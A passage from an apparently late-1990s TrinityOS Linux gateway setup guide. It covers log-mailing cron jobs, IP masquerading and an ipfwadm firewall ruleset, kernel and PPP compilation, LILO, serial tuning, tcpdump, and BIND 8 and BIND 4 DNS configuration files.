+'%b%d%y'` rm xferlog.`date +'%b%d%y'` echo "parsed, filtered, mailed and deleted xferlog" cat /var/log/kernel | grep "`cat /var/log/yesterdays-date`" > kernel.`date +'%b%d%y'` mail -s "TrinityOS kernel for `cat /var/log/yesterdays-date`" login@your.host < kernel.`date +'%b%d%y'` rm kernel.`date +'%b%d%y'` echo "parsed, filtered, mailed and deleted kernel" -- - Now, make the file executable by running "chmod +x sendlogs" - Next, you have to make cron run this script: Slackware users: Edit the file /var/spool/cron/crontabs/root and append the following: -- # Run the sendlogs program at 12:00am everyday 0 12 * * * /var/adm/sendlogs Redhat users: Create the file /etc/cron.daily/sendlogs and enter in: ---- #!/bin/sh cd /var/log ./sendlogs ---- - Thats it. Now, make cron re-read it's config files by doing: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` ================================================================================ Section 9 - MASQ startup and advanced firewall rulesets - Create the file /etc/rc.d/rc.masq Slackware users: Put the module info in the /etc/rc.d/rc.modules file - NOTE: If you don't plan to use some of these modules, comment or un-comment the various lines (I've commented out cuseeme, vdolive, and raudio). --- echo "Enabling IP MASQ, MASQ timeouts, MASQ modules and advanced firewalling" #Load the MASQ modules #BSDComp /sbin/modprobe bsd_comp # echo Loading MASQ modules #/sbin/modprobe ip_masq_cuseeme /sbin/modprobe ip_masq_ftp /sbin/modprobe ip_masq_irc /sbin/modprobe ip_masq_quake #/sbin/modprobe ip_masq_vdolive /sbin/modprobe ip_masq_raudio # Finished with MASQ modules echo "Adding multicast route.." /sbin/route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0 echo "Enabling IP Masqurading.." echo "1" > /proc/sys/net/ipv4/ip_forwarding #Note: Redhat users can enable this also by turning the # flag forward flag on in /etc/sysconfig/network # # Change the forward line to # FORWARD_IPV4=true # Startup MASQ with this ruleset FIRST.. once this works # for you, # out the next (5) lines and un-# out # the advanced firewall ruleset section below /sbin/ipfwadm -F -p deny /sbin/ipfwadm -F -a m -S 192.168.0.0/24 -D 0.0.0.0/0 -W eth0 echo "Extending MASQ timeouts.." /sbin/ipfwadm -M -s 7200 10 120 #Enable Full packet firewalling. #NOTE: These rulesets are borrowed from a few people and # the completeness of them is not yet 100% confirmed # #/etc/rc.d/rc.master-firewall echo "rc.masq done." ---- - Make the rc.masq file executable chmod +x /etc/rc.d/rc.masq - Create the file for future use once you have confirmed the initial MASQ functionality. /etc/rc.d/rc.master-firewall -- #!/bin/bash # **Note**: This config ASSUMES that you have your private LAN # address as 192.168.0.x -AND- your static IP address # is 205.162.63.211. Obviously, this is NOT your # static IP address. So, you should use this following # script line instead: # # extnic='/sbin/ifconfig | grep -A 4 ppp0 | awk '/inet/ { print $2 } ' | sed -e s/addr://' intnic="192.168.0.1" extnic="205.162.63.211" universe="0.0.0.0/0" localnet="192.168.0.0/24" unprivports="1024:65535" # Flush all the rules /sbin/ipfwadm -I -f /sbin/ipfwadm -O -f /sbin/ipfwadm -F -f # Set timeout values for masq sessions (seconds). # I only did this because my telnet connections would drop after inactivity of 15 # mins. /sbin/ipfwadm -M -s 7200 10 120 # Set the default policy of deny /sbin/ipfwadm -I -p deny /sbin/ipfwadm -O -p deny /sbin/ipfwadm -F -p deny # Allow ip masquerading for all internal hosts. We will handle security with # the input and output filters on the external NIC. /sbin/ipfwadm -F -a m -P all -S $localnet -D $universe # Protection against ip spoofing on external interface. /sbin/ipfwadm -I -a d -V $extnic -S $localnet -D $universe # Incoming Rules on internal interface. Everyone behind the firewall can do # anything they want. /sbin/ipfwadm -I -a a -V $intnic -P all -S $universe -D $universe # Next rule applies for stuff like talk /sbin/ipfwadm -I -a a -V 127.0.0.1 -P all -S $universe -D $universe # Outgoing Rules on internal interface /sbin/ipfwadm -O -a a -V $intnic -P all -S $universe -D $universe # Next rule applies for stuff like talk /sbin/ipfwadm -O -a a -V 127.0.0.1 -P all -S $universe -D $universe # Incoming Rules on external interface /sbin/ipfwadm -I -a a -V $extnic -P tcp -k -S $universe -D $localnet $unprivports ##/sbin/ipfwadm -I -a a -V $extnic -P tcp -S $universe ftp-data -D $extnic $unprivports # IDENT - Allow IDENT in but make sure it is disabled in /etc/inetd.conf /sbin/ipfwadm -I -a a -P tcp -D $universe 113 # ------------------------------ # Specifically allowed machines: Add specific IP addresses to suit your needs # ------------------------------ #Trinity /sbin/ipfwadm -I -a a -P tcp -S $intnic -D $intnic www ftp \ ftp-data pop-3 2112 2312 42 domain $unprivports #rocko ------------------------- /sbin/ipfwadm -I -a a -W ppp0 -P tcp -S 132.241.185.20/32 -D $extnic \ 2112 2312 42 domain $unprivports /sbin/ipfwadm -I -a a -V $extnic -P tcp -S $universe ftp-data -D $extnic $unprivports # ------------------------------ #/sbin/ipfwadm -I -a a -V $extnic -P udp -S $universe -D $extnic 42 53 $unprivports /sbin/ipfwadm -I -a a -P udp -S $universe -D $universe 42 53 $unprivports /sbin/ipfwadm -I -a a -V $extnic -P icmp -S $universe -D $extnic /sbin/ipfwadm -I -a a -W eth0 -P icmp -S $localnet -D $universe #test /sbin/ipfwadm -I -a a -P icmp -S $universe -D $universe # Outgoing general rules: # Allow IDENT out of the firewall interfaces but it will be disabled at inetd.conf /sbin/ipfwadm -O -a a -P tcp -D $universe 113 # Outgoing Rules on local interfaces /sbin/ipfwadm -O -a a -P tcp -S $universe -D $universe smtp www ftp ftp-data \ pop-3 2312 42 domain $unprivports # Outgoing Rules on external interface /sbin/ipfwadm -O -a a -V $extnic -P tcp -S $universe -D $universe /sbin/ipfwadm -O -a a -V $extnic -P tcp -S $extnic -D $universe /sbin/ipfwadm -O -a a -V $extnic -P tcp -S $extnic smtp www ftp ftp-data \ pop-3 telnet 42 domain -D $universe $unprivports #/sbin/ipfwadm -O -a a -V $extnic -P udp -S $localnet -D $universe 42 53 $unprivports /sbin/ipfwadm -O -a a -P udp -S $localnet -D $universe 42 53 $unprivports /sbin/ipfwadm -O -a a -V $extnic -P udp -S $extnic -D $universe 42 53 $unprivports # For local pings /sbin/ipfwadm -O -a a -P icmp -S $localnet -D $universe /sbin/ipfwadm -O -a a -V $extnic -P icmp -S $extnic -D $universe # -------------------------------------------------------------- # Block everything that I have not explicitly allowed # Do not edit below this line! # Internal interface /sbin/ipfwadm -I -a d -P all -V $intnic -S $universe -D $universe -o /sbin/ipfwadm -O -a d -P all -V $intnic -S $universe -D $universe -o # Local interface /sbin/ipfwadm -I -a d -P all -V 127.0.0.1 -S $universe -D $universe -o #/sbin/ipfwadm -O -a d -P all -V 127.0.0.1 -S $universe -D $universe -o # External interface /sbin/ipfwadm -I -a d -P all -V $extnic -S $universe -D $universe -o /sbin/ipfwadm -O -a d -P all -V $extnic -S $universe -D $universe -o #Done. ================================================================================ Section 10 - Initial Linux Kernel compiling - FTP the kernel to "/usr/src/" - Uncompress it (ie. "tar -xzvf linux-2.0.34.tgz") - Configure it ("make config") - below config is for my hardware, make changes to your config as necessary -------- # # Automatically generated make config: don't edit # # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # Loadable module support # CONFIG_MODULES=y # CONFIG_MODVERSIONS is not set # CONFIG_KERNELD is not set # # General setup # # CONFIG_MATH_EMULATION is not set CONFIG_NET=y # CONFIG_MAX_16M is not set # CONFIG_PCI is not set CONFIG_SYSVIPC=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_JAVA is not set CONFIG_KERNEL_ELF=y # CONFIG_M386 is not set CONFIG_M486=y # CONFIG_M586 is not set # CONFIG_M686 is not set # # Floppy, IDE, and other block devices # CONFIG_BLK_DEV_FD=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_IDECD is not set # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_BLK_DEV_IDE_PCMCIA is not set # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_IDE_CHIPSETS is not set # # Additional Block Devices # # CONFIG_BLK_DEV_LOOP is not set # CONFIG_BLK_DEV_MD is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_INITRD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_BLK_DEV_HD is not set # # Networking options # CONFIG_FIREWALL=y # CONFIG_NET_ALIAS is not set CONFIG_INET=y CONFIG_IP_FORWARD=y CONFIG_IP_MULTICAST=y CONFIG_SYN_COOKIES=y CONFIG_RST_COOKIES=y CONFIG_IP_FIREWALL=y # CONFIG_IP_FIREWALL_VERBOSE is not set CONFIG_IP_MASQUERADE=y # # Protocol-specific masquerading support will be built as modules. # CONFIG_IP_MASQUERADE_IPAUTOFW=y CONFIG_IP_MASQUERADE_ICMP=y # CONFIG_IP_TRANSPARENT_PROXY is not set CONFIG_IP_ALWAYS_DEFRAG=y # CONFIG_IP_ACCT is not set CONFIG_IP_ROUTER=y # CONFIG_NET_IPIP is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set # # (it is safe to leave these untouched) # CONFIG_INET_PCTCP=y # CONFIG_INET_RARP is not set # CONFIG_NO_PATH_MTU_DISCOVERY is not set CONFIG_IP_NOSR=y CONFIG_SKB_LARGE=y # # # # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_AX25 is not set # CONFIG_BRIDGE is not set # CONFIG_NETLINK is not set # # SCSI support # CONFIG_SCSI=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=y CONFIG_BLK_DEV_SR=y # CONFIG_CHR_DEV_SG is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set CONFIG_SCSI_CONSTANTS=y # # SCSI low-level drivers # # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_AHA152X is not set CONFIG_SCSI_AHA1542=y # CONFIG_SCSI_AHA1740 is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_ADVANSYS is not set # CONFIG_SCSI_IN2000 is not set # CONFIG_SCSI_AM53C974 is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DTC3280 is not set # CONFIG_SCSI_EATA_DMA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GENERIC_NCR5380 is not set # CONFIG_SCSI_NCR53C406A is not set # CONFIG_SCSI_PPA is not set # CONFIG_SCSI_PAS16 is not set # CONFIG_SCSI_QLOGIC_FAS is not set # CONFIG_SCSI_SEAGATE is not set # CONFIG_SCSI_T128 is not set # CONFIG_SCSI_U14_34F is not set # CONFIG_SCSI_ULTRASTOR is not set # CONFIG_SCSI_GDTH is not set # # Network device support # CONFIG_NETDEVICES=y CONFIG_DUMMY=m # CONFIG_EQUALIZER is not set # CONFIG_DLCI is not set # CONFIG_PLIP is not set CONFIG_PPP=y # # CCP compressors for PPP are only built as modules. # CONFIG_SLIP=y CONFIG_SLIP_COMPRESSED=y # CONFIG_SLIP_SMART is not set # CONFIG_SLIP_MODE_SLIP6 is not set # CONFIG_NET_RADIO is not set CONFIG_NET_ETHERNET=y CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL16 is not set CONFIG_EL3=y # CONFIG_VORTEX is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_ISA is not set # CONFIG_NET_EISA is not set # CONFIG_NET_POCKET is not set # CONFIG_TR is not set # CONFIG_FDDI is not set # CONFIG_ARCNET is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # CD-ROM drivers (not for SCSI or IDE/ATAPI drives) # CONFIG_CD_NO_IDESCSI=y # CONFIG_AZTCD is not set # CONFIG_GSCD is not set CONFIG_SBPCD=y # CONFIG_SBPCD2 is not set # CONFIG_MCD is not set # CONFIG_MCDX is not set # CONFIG_OPTCD is not set # CONFIG_CM206 is not set # CONFIG_SJCD is not set # CONFIG_CDI_INIT is not set # CONFIG_CDU31A is not set # CONFIG_CDU535 is not set # # Filesystems # # CONFIG_QUOTA is not set CONFIG_MINIX_FS=y # CONFIG_EXT_FS is not set CONFIG_EXT2_FS=y # CONFIG_XIA_FS is not set CONFIG_FAT_FS=y CONFIG_MSDOS_FS=y CONFIG_VFAT_FS=y # CONFIG_UMSDOS_FS is not set CONFIG_PROC_FS=y CONFIG_NFS_FS=y # CONFIG_ROOT_NFS is not set CONFIG_SMB_FS=y CONFIG_SMB_WIN95=y CONFIG_ISO9660_FS=y # CONFIG_HPFS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AFFS_FS is not set # CONFIG_UFS_FS is not set # # Character devices # CONFIG_SERIAL=y # CONFIG_DIGI is not set # CONFIG_CYCLADES is not set # CONFIG_STALDRV is not set # CONFIG_RISCOM8 is not set CONFIG_PRINTER=y # CONFIG_SPECIALIX is not set # CONFIG_MOUSE is not set # CONFIG_UMISC is not set # CONFIG_QIC02_TAPE is not set # CONFIG_FTAPE is not set # CONFIG_APM is not set # CONFIG_WATCHDOG is not set # CONFIG_RTC is not set # # Sound # CONFIG_SOUND=y # CONFIG_LOWLEVEL_SOUND is not set # # Kernel hacking # # CONFIG_PROFILE is not set ------------' - edit /usr/src/linux/include/linux/sbpcd.h (as of 2.0.33) - Roughly at line 77, verify the top most SB address and CDROM port is correct. - Roughly at line 107, change the "#define DISTRIBUTION" variable to "0" to reflect that you have configured the sound drivers - Roughly at line 121 and 128, change ALL eject line variable to "0" so the drives won't eject their CDs Now we need to shift gears and jump to the PPP code installation to verify if there is any newer code in the PPP distribution than the kernel distribution. - Kernel 2.0.34 didn't come with the new v1.16 3Com driver. Bummer. It was pulled because of problems but I haven't had any and there are a LOT of fixes in it. So.. do the following: - mv /usr/src/linux/drivers/net/3c509.c /usr/src/linux/drivers/net/3c509.c.orig - Download the new driver from: ftp://cesdis.gsfc.nasa.gov/pub/linux/drivers/3c509.c If, for some reason, the drive is not available, email me and I'll mail it to you. ================================================================================ Section 11 - Compile PPPd - Download PPP from the top URL and put it in "/usr/src" - "tar -xvzf ppp-2.3.2.tar.gz" - "cd ppp-2.3.2" - "configure" - Now, some patches won't need to be installed based upon the version of PPPD and/or the Linux kernel they are installing. - "make" NOTE: You can use "make USE_MS_DNS=1" to insure your system uses the ISP's offered DNS servers over your statically-configure. Remember, since TrinityOS will run it's OWN DNS server, it really won't matter. - "make install" Ok.. now back to the kernel configuring for now.. ================================================================================ Section 12 - Final Linux Kernel compiling and installation - Next, "make clean", "make dep", "make zImage" and allow for the kernel to compile (~3mins on a P-II 233) - Now, compile and install the necessary system modules: "make modules", "make modules_install" - Once the kernel has compiled, do the following command line (replacing "XYZ" with an identifing name like "2031-masq": Slackware: "cp /usr/src/linux/arch/i386/boot/zImage /XYZ" Redhat: "cp /usr/src/linux/arch/i386/boot/zImage /boot/XYZ" ================================================================================ Section 13 - Lilo configuration and installation - Edit the /etc/lilo.conf file to reflect your new kernel. **NOTE: If you aren't using LILO, you need to configure your boot method (loadlin, NT boot loader, OS/2 boot loader, System Commander, etc) to use this new kernel. - Add an entry like below : # LILO configuration file # generated by 'liloconfig' # # Start LILO global section boot = /dev/hda append="ether=0,0,eth1" #compact # faster, but won't work on all systems. delay = 50 vga = normal # force sane state # ramdisk = 0 # paranoia setting # End LILO global section # Linux bootable partition config begins image = /2033-1542-sb16 root = /dev/hda6 label = linux read-only # Non-UMSDOS filesystems should be mounted read-only for checking # Linux bootable partition config ends ** Cablemodem users: ** For a secure system, you should have (2) ethernet cards installed. One to the cablemodem and the other for the internal LAN. If both installed Ethernet cards from different vendors, then skip this next part. If the two Ethernet cards are identical, Linux will only autodetect ONE card. To make Linux look for additional ethernet cards, add the following to the lilo.conf file: append="ether=0,0,eth1" - type "lilo" to re-write your boot sector. If everything is ok, you will be given a short list of boot images that LILO will boot from. ================================================================================ Section 14 - Additional RC script configuration and network optimization Since my system uses all (4) COMM ports and Linux doesn't like to share interupts (IRQs), you have to tell Linux how to use your specific hardware setup. In addition to configuring Linux to understand your hardware setup, you need to optimize it for maximum performance (serial ports, etc). NOTE: Until I added these changes, both GPM (tty mouse program) and Xwindows (Xfree86, MetroX, etc) would not load correctly let alone be useful. Create or add the folling lines to the /etc/rc.d/rc.serial file: ---- echo "Configuring COM1 for 115200" ${SETSERIAL} /dev/ttyS0 spd_vhi echo "RE-configuring COM3 and COM4 to use proper IRQs" ${SETSERIAL} /dev/ttyS2 uart 16450 port 0x3E8 irq 3 ${SETSERIAL} /dev/ttyS3 uart 16550A port 0x2E8 irq 5 ${SETSERIAL} -bg /dev/ttyS0 /dev/ttyS1 /dev/ttyS2 /dev/ttyS3 echo "rc.serial done." ---- If you just created this file, do the following: Add the following test to the very top lines to the /etc/rc.d/rc.serial file: #!/bin/sh SETSERIAL="/bin/setserial -b" chmod +x /etc/rc.d/rc.serial Redhat: Add the following to the end of the /etc/rc.d/rc.sysinit file: # Initialize the serial subsystem /etc/rc.d/rc.serial Since I use an older Logitech C7 mouse, Linux doesn't come on-line with it the first time. Fix this by doing: Redhat: Edit /etc/rc.d/init.d/gpm replace this: daemon gpm -t $MOUSETYPE with this: daemon gpm -b 9600 -r 50 -t $MOUSETYPE Slackware: Edit /etc/rc.d/rc.local replace this: gpm -t logi with gpm -b 9600 -r 50 -t $logi Network Optimization: Both Slackware and Redhat, out of the box, do NOT optimize the TCP/IP window size. This can make a BIG difference with performance: Redhat5: Edit "/etc/sysconfig/network-scripts/ifup" and around lines 119 and 134, find the lines: "route add -net ${NETWORK} netmask ${NETMASK} ${DEVICE}" and "route add default gw ${GATEWAY} ${DEVICE}" and change them to: "route add -net ${NETWORK} netmask ${NETMASK} window 8192 ${DEVICE}" and "route add default gw ${GATEWAY} window 8192 ${DEVICE}" Slackware: Edit /etc/rc.d/rc.inet1" and around lines 47 and 49, find the following text (note: your setup might look a little different so make any changes that are needed for your setup) "/sbin/route add -net ${NETWORK} netmask ${NETMASK} eth0" and "if [ ! "$GATEWAY" = "" ]; then /sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 metric 1 fi" and replace them with the following: "/sbin/route add -net ${NETWORK} netmask ${NETMASK} window 8192 eth0" and "if [ ! "$GATEWAY" = "" ]; then /sbin/route add default gw ${GATEWAY} netmask 0.0.0.0 window 8192 metric 1 fi" ================================================================================ Section 15 - Patching, Compiling, and installing IPFWADM - FTP the ipfwadm source code tgz or RPM file to "/usr/src/" - Un-compress the IPFWADM tgz file ("tar -xzvf ipfwadm-2.3.0.tgz") or install the RPM file ("rpm -i ipfwadm-2.3.0-1.i386.rpm") Note: If you already installed IPFWADM and the above RPM installation didn't work, don't worry, the stock IPFWADM that comes with Redhat will work ok. - FTP the IPFWADM timeout patch to /usr/src/ipfwadm-2.3.0 - Un-compress the IPFWADM patch ("gunzip ipfwadm-2.3.0-generic-timeout.patch.gz") - Apply the timeout patch "patch -p0 < ipfwadm-2.3.0-generic-timeout.patch" - Make sure that all "Hunks Succeed" - Edit the "ipfwadm.c" file - At line 107, insert this line: #include - Compile IPFWADM by doing: "make" "make install" ================================================================================ Section 16 - Mail aliases for system administration - Aliases Edit the /etc/aliases file and insert the following: root: your-email-address@your-isps.domain webmaster: your-email-address@your-isps.domain postmaster: your-email-address@your-isps.domain ================================================================================ Section 17 - Preparing for reboot and clearing the logs - For trouble shooting, do the following: Slackware: "mv /var/adm/messages /var/adm/messages.old" "touch /var/adm/messages" "mv /var/adm/syslog /var/adm/syslog.old" "touch /var/adm/syslog" "mv /var/adm/debug /var/adm/debug.old" "touch /var/adm/debug" Redhat: "mv /var/log/messages /var/log/messages.old" "touch /var/adm/messages" "mv /var/log/syslog /var/log/syslog.old" "touch /var/log/syslog" "mv /var/log/debug /var/log/debug.old" "touch /var/log/debug" - Reboot with the new kernel - Once the computer has rebooted, look at the /var/adm/messages and /var/adm/syslog files to make sure no errors or problems were found. If there were errors.. fix them before you continue. ================================================================================ Section 18 - Verifing MASQ module installation - Next, - make sure all of the IP MASQ modules are running by typing in "lsmod" - You will see the following: trinity2:/usr/src/ppp-2.2.0g# lsmod Module: #pages: Used by: ip_masq_raudio 1 0 ip_masq_quake 1 0 ip_masq_irc 1 0 ip_masq_ftp 1 0 bsd_comp 1 0 ** If you don't see *ALL* of these, check your /etc/rc.d/rc.modules and try loading them manually by doing "./etc/rc.d/rc.modules" ================================================================================ Section 19 - Install TCPDUMP and NetWatch for tracing traffic You don't have to download TCPDUMP Redhat5 if installed it when you installed Redhat. TCPDUMP-- - Download "libpcap" and do the following commands: "configure" "make" "make install" "make install-man" "make install-incl" "cp libpcap/bpf/net/* /usr/include/net" - Download "tcpdump" and do the following commands: "configure" "make" "make install" "make install-man" - Now run "tcpdump" and watch it fly. Look at TCPDUMP's man page as you can send captures to a file, filter the traffic to only stuff you care upon based on source IP, destination IP, ports, UDP, TCP, etc.. Netwatch (uses a retarded setup (defaults to Slackware but it works nicely)-- NOTE: This doesn't seem to work over TELNETS. Only on the console. - Download NetWatch - Redhat users: create the file /etc/rc.d/rc.inet1 and substitute in your proper netmask ---- NETMASK="255.255.255.0" # REPLACE with YOUR netmask! ---- ================================================================================ Section 20 - PPPd configuration [For Modem users only] Ok.. You have a PPP enabled kernel running (Congrats!) Now lets get PPPD & CHAT running. Follow this link until I can integrate it into the TrinityOS doc: http://www.ecst.csuchico.edu/~dranch/PPP/ppp-performance.html#linux ================================================================================ Section 21 - Diald configuration [For Modem users only] /etc/diald.conf Use dcntrl or diald-top to see which packages bring the link up. - /etc/rc.d/rc.S Enabled rc.serial load up - /etc/rc.d/rc.serial /bin/setserial /dev/ttyS3 spd_vhi cp diald.conf /etc/diald diald.conf: restrict 16:00:00 20:45:00 * * * down restrict * * * * * mode ppp connect /etc/ppp/diald/earthlink-connect device /dev/cua1 speed 115200 modem lock crtscts local 192.168.1.7 remote 0.0.0.0 dynamic defaultroute accounting-log /var/adm/ppp.log include /usr/local/lib/diald/standard.filter ================================================================================ Section 22 - BIND Installation and Configuration Named The DNS server running from the "Named" UNIX program is the service that converts the name "www.yahoo.com" to the IP address 204.71.177.71. As you might have already figured out, this is a CRITICAL program. - To setup your own domain, all you need to do is register with the Internic at rs.internic.net and pay $75 for 2 years. Then, you need to find another domain that can SECONDARY for your DNS server in case your server goes down. This document is intended for BIND v8.x though I have posted my old Bind v4 docs as well. The reason for this is that BIND v4.x and it's configuration files are old and now deemed -=* DEAD *=-. If you are unsure what version you have installed, run "strings /usr/sbin/named | grep named" and look through the results until you find the version number. ** If you need more info, follow this great HOWTO on DNS. It's a good resource but there are ERRORS in it's config!!!: ftp://sunsite.unc.edu/pub/Linux/docs/HOWTO/DNS-HOWTO *** NOTE: There is a MAJOR security exploit out there for older versions of Named. Make sure you are running at LEAST v4.9.7 or v8.1.2 or you will be vunerable and getting ROOT access on your box will be EASY! -- Slackware Specific: - Un #'d out the lines in the "/etc/rc.d/rc.inet2" file for "named" Redhat5 Specific: - Make sure /etc/rc.d/rc3.d/S55named exists ========================================================================== Here are the configs for Bind v8.1.2 ========================================================================== /etc/resolv.conf ---- search trinnet.net nameserver 127.0.0.1 ---- Slackware: /etc/host.conf ---- order hosts, bind multi on ---- Redhat: /etc/nsswitch.conf Change the "hosts" line to read: "hosts: files dns nisplus nis " /etc/aliases - Towards the top, find the entry for "postmaster" and add an identical line for "hostmaster" - If you rarely login as root but you do login to another account often, redirect your "root" mail to that address. To do this, change the line towards the bottom of the file to read: "root: your-prefered-mail-address" For me, its: "root: dranch" - Compile up the new alias database by running "newaliases" /etc/named.conf ---- // /etc/named.conf // Config file for caching only name server options { directory "/var/named"; allow-transfer { // ***** insert the IP address of your acting SECONDARY SERVER here // 208.162.41.10/32; }; // Uncommenting this might help if you have to go through a // firewall and things are not working out: // query-source address * port 53; }; zone "." { type hint; file "root.hints"; }; zone "0.0.127.in-addr.arpa" { notify no; type master; file "127.0.0.db"; }; zone "trinnet.net" { notify yes; type master; file "trinnet.net.db"; }; zone "137.83.1.24.in-addr.arpa" { notify yes; type master; file "24.1.83.137.db"; }; zone "0.168.192.in-addr.arpa" { notify no; type master; file "192.168.0.db"; }; ---- /var/named/127.0.0.db ---- @ IN SOA ns.trinnet.net. hostmaster.trinnet.net. ( 1 ; Serial 8H ; Refresh 2H ; Retry 1W ; Expire 1D) ; Minimum TTL NS ns.trinnet.net. 1 PTR localhost. ---- /var/named/192.168.0.db ---- @ IN SOA ns.trinnet.net. hostmaster.trinnet.net. ( 1998041301 ; Serial, todays date + todays serial 8H ; Refresh 2H ; Retry 1W ; Expire 1D) ; Minimum TTL NS ns.trinnet.net. 1 PTR trinity2-int.trinnet.net. 2 PTR stimpy2.trinnet.net. 4 PTR dellster.trinnet.net. 9 PTR spare.trinnet.net. 10 PTR spare2.trinnet.net. ---- /var/named/24.1.83.137.0.db ---- @ IN SOA ns.trinnet.net. hostmaster.trinnet.net. ( 1998041301 ; Serial, todays date + todays serial 8H ; Refresh 2H ; Retry 1W ; Expire 1D) ; Minimum TTL NS ns.trinnet.net. 1 PTR trinity2-int.trinnet.net. 2 PTR stimpy2.trinnet.net. 4 PTR dellster.trinnet.net. 9 PTR spare.trinnet.net. 10 PTR spare2.trinnet.net. ---- /var/named/root.hints.db ---- . 6D IN NS G.ROOT-SERVERS.NET. . 6D IN NS J.ROOT-SERVERS.NET. . 6D IN NS K.ROOT-SERVERS.NET. . 6D IN NS L.ROOT-SERVERS.NET. . 6D IN NS M.ROOT-SERVERS.NET. . 6D IN NS A.ROOT-SERVERS.NET. . 6D IN NS H.ROOT-SERVERS.NET. . 6D IN NS B.ROOT-SERVERS.NET. . 6D IN NS C.ROOT-SERVERS.NET. . 6D IN NS D.ROOT-SERVERS.NET. . 6D IN NS E.ROOT-SERVERS.NET. . 6D IN NS I.ROOT-SERVERS.NET. . 6D IN NS F.ROOT-SERVERS.NET. G.ROOT-SERVERS.NET. 5w6d16h IN A 192.112.36.4 J.ROOT-SERVERS.NET. 5w6d16h IN A 198.41.0.10 K.ROOT-SERVERS.NET. 5w6d16h IN A 193.0.14.129 L.ROOT-SERVERS.NET. 5w6d16h IN A 198.32.64.12 M.ROOT-SERVERS.NET. 5w6d16h IN A 202.12.27.33 A.ROOT-SERVERS.NET. 5w6d16h IN A 198.41.0.4 H.ROOT-SERVERS.NET. 5w6d16h IN A 128.63.2.53 B.ROOT-SERVERS.NET. 5w6d16h IN A 128.9.0.107 C.ROOT-SERVERS.NET. 5w6d16h IN A 192.33.4.12 D.ROOT-SERVERS.NET. 5w6d16h IN A 128.8.10.90 E.ROOT-SERVERS.NET. 5w6d16h IN A 192.203.230.10 I.ROOT-SERVERS.NET. 5w6d16h IN A 192.36.148.17 F.ROOT-SERVERS.NET. 5w6d16h IN A 192.5.5.241 ---- /var/named/trinnet.net.db ---- ; ; Zone file for trinnet.net ; ; The full zone file ; @ IN SOA ns.trinnet.net. hostmaster.trinnet.net. ( 1998041301 ; serial, todays date + todays serial # 8H ; refresh, seconds 2H ; retry, seconds 1W ; expire, seconds 1D ) ; minimum, seconds ; NS ns.trinnet.net. ; Inet Address of name server NS ns1.csil.com. ; Inet address of secondary NS server MX 10 mail.trinnet.net. ; Primary Mail Exchanger ns A 24.1.83.137 HINFO "a486/160/40M" "Linux 2.0" mail CNAME ns ftp CNAME ns trinity2 CNAME ns ;----------------- trinity2-int A 192.168.0.1 HINFO "a486/160/40M" "Linux 2.0" stimpy2 A 192.168.0.2 HINFO "iPentium-II/260/64M" "Win95" dellster A 192.168.0.4 HINFO "iPentium-MMX/166/64M" "Win95" spare A 192.168.0.9 HINFO "Unknown" "Unknown" spare2 A 192.168.0.10 HINFO "Unknown" "Unknown" ---- ========================================================================== Here are the configs for Bind v4.9.7 ========================================================================== - Edit/create "/etc/named.boot" file and make the following additions and changes: ---- ; ; boot file for name server ; ;directory /usr/local/adm/ directory /var/named ; ; type domain source host/file backup file ; primary trinity.value.net trinity.db primary 0.168.192.in-addr.arpa 192.168.db primary 0.0.127.in-addr.arpa localhost.db xfernets 208.162.41.10&255.255.255.255 ; cache . named.ca ; ---- - Edit/create "/var/named/192.168.db" file and make the following additions and changes: ------ ;SOA ;domain ttl ; 0.168.192.in-addr.arpa. IN SOA trinity.trinity.value.net. dranch.r ocko.csuchico.edu. ( 97110301 ; serial # 3600 ; refresh 600 ; retry 634000 ; expire: 1 week 86400 ; ttl: 1 day ) 0.168.192.in-addr.arpa. IN NS trinity.trinity.value.net. ; 1 IN PTR trinity.trinity.value.net. 2 IN PTR stimpy2.trinity.value.net. 3 IN PTR spare.trinity.value.net. 4 IN PTR dellster.trinity.value.net. 9 IN PTR spare.trinity.value.net. 10 IN PTR spare2.trinity.value.net. 250 IN PTR hub.trinity.value.net. ------- - Edit/create "/var/named/localhost.db" file and make the following additions and changes: ---- ;SOA ;domain ttl ; 0.0.127.in-addr.arpa. IN SOA trinity.trinity.value.net. dranch.rocko.csu chico.edu. ( 1 ; serial # 3600 ; refresh 600 ; retry 634000 ; expire: 1 week 86400 ; ttl: 1 day ) 0.0.127.in-addr.arpa. IN NS trinity.trinity.value.net. 1 IN PTR localhost. ----- - Edit/create "/var/named/named.db" file and make the following additions and changes: ; This file holds the information on root name servers needed to ; initialize cache of Internet domain name servers ; (e.g. reference this file in the "cache . " ; configuration file of BIND domain name servers). ; ; This file is made available by InterNIC registration services ; under anonymous FTP as ; file /domain/named.root ; on server FTP.RS.INTERNIC.NET ; -OR- under Gopher at RS.INTERNIC.NET ; under menu InterNIC Registration Services (NSI) ; submenu 